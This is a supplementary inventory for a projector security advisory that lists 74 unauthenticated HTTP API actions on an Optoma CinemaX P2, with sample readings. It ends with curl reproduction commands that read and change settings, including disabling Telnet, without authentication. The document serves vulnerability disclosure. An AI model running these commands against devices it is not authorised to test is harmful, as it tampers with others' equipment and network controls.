Supplementary inventory for the security advisory at /security/2026-02-01-smart-projector/ — full list of HTTP API endpoints exposed by MCentralmanager.apk (com.coretronic.demo.server) on TCP port 2345 of the Optoma CinemaX P2 (firmware TVOS-04.24.010.04.01), tracked under CVE-2026-30496 (CVSS 6.3 Medium).
All endpoints are accessible without authentication to any device on the same Layer 2 network. The list below is from a single CinemaX P2 (model X1VDPTHG); values are example readings from that device, not a specification.
API Behaviour
URL pattern: http://<ip>:2345/<behavior>/<action>
| Method |
Behavior |
URL pattern |
Function |
| GET |
get |
/get/<action> |
Read integer value |
| GET |
get_s |
/get_s/<action> |
Read string value |
| GET |
inc |
/inc/<action> |
Increment integer value |
| GET |
dec |
/dec/<action> |
Decrement integer value |
| PUT |
set |
/set/<action>?value=X |
Set integer value |
| PUT |
set_s |
/set_s/<action>?value=X |
Set string value |
| PUT |
action |
/action/<action> |
Trigger action |
There is no per-action authorisation; every action enum value reachable via /get/ is also writable via /set/. Confirmed during disclosure testing for Volume, Mute, and TelnetOn (the latter as a representative protocol-enable flag).
Endpoints
74 distinct actions enumerated. Sample values shown are what one device reported; they are not defaults and will vary between installations.
Display & image (14)
| Endpoint |
Sample value |
Brightness |
-9 |
Contrast |
10 |
Color |
6 |
Sharpness |
10 |
Gamma |
0 |
AspectRatio |
0 |
DisplayMode |
0 |
BrightnessMode |
12 |
BrilliantColor |
10 |
ColorTemperature |
1 |
ColorSpace |
0 |
Tint |
0 |
ProjectionMode |
2 |
PureMotion |
0 |
Keystone, geometry, cursor & grid (9)
| Endpoint |
Sample value |
HKeystone |
0 |
VKeystone |
0 |
GeometricWarpControl |
1 |
GeometricWarpInner |
0 |
GeometricWarpMovement |
2 |
GeometricWarpCursorColor |
2 |
GeometricBackgroundColor |
0 |
GeometricCursorPoints |
1 |
GeometricGridColor |
1 |
Audio (8)
| Endpoint |
Sample value |
Volume |
93 |
Mute |
0 |
AudioOut |
0 |
InternalSpeaker |
0 |
SoundEffect |
0 |
SPDIF |
2 |
SpeakerDelay |
0 |
DigitalOutputDelay |
0 |
Input source & signal (8)
| Endpoint |
Sample value |
CurrentInputSource |
4 |
AutoSource |
1 |
SignalPowerOn |
0 |
SignalFrequency |
0 |
SignalHPosition |
0 |
SignalVPosition |
0 |
SignalPhase |
0 |
EDIDReminder |
0 |
Power management (6)
| Endpoint |
Sample value |
DirectPowerOn |
1 |
PowerModeStandby |
1 |
PowerOffLink |
1 |
PowerOnLink |
1 |
AutoPowerOffMin |
20 |
SleepTimerMin |
0 |
Network & control protocols (8)
These flags advertise the device's exposed control surface and are writable. An attacker with access to port 2345 can flip any of them without authentication.
| Endpoint |
Sample value |
HTTPOn |
1 |
TelnetOn |
1 |
PJLinkOn |
1 |
CrestronOn |
1 |
ExtronOn |
1 |
AMXDeviceDiscoveryOn |
1 |
LANDHCP |
0 |
WLANWiFiOn |
1 |
Lamp & filter (7)
| Endpoint |
Sample value |
LampHoursTotal |
0 |
LampHoursBright |
0 |
LampHoursDynamic |
0 |
LampHoursEco |
0 |
LampReminder |
0 |
FilterUsageHour |
0 |
FilterReminder |
0 |
HDR (3)
| Endpoint |
Sample value |
DynamicRangeHDR |
0 |
DynamicRangeHDRPictureMode |
2 |
HLGPictureMode |
1 |
Sensors (2)
| Endpoint |
Sample value |
ProximitySensor |
1 |
HighAltitude |
0 |
Colour calibration (6)
| Endpoint |
Sample value |
RedGain |
0 |
GreenGain |
0 |
BlueGain |
0 |
RedBias |
0 |
GreenBias |
0 |
BlueBias |
0 |
Identification & UI (3)
| Endpoint |
Sample value |
ProjectorID |
0 |
MenuTimer |
2 |
FrameDelay |
1 |
Reproduction
# Read any value (no authentication)
curl http://<projector-ip>:2345/get/Volume
# Write any value (no authentication)
curl -X PUT "http://<projector-ip>:2345/set/Volume?value=50"
# Toggle a control protocol flag without authentication
curl http://<projector-ip>:2345/get/TelnetOn
curl -X PUT "http://<projector-ip>:2345/set/TelnetOn?value=0"
See the main advisory for impact, vendor response, and remediation guidance.
Comments
No comments yet. Be the first!
Leave a comment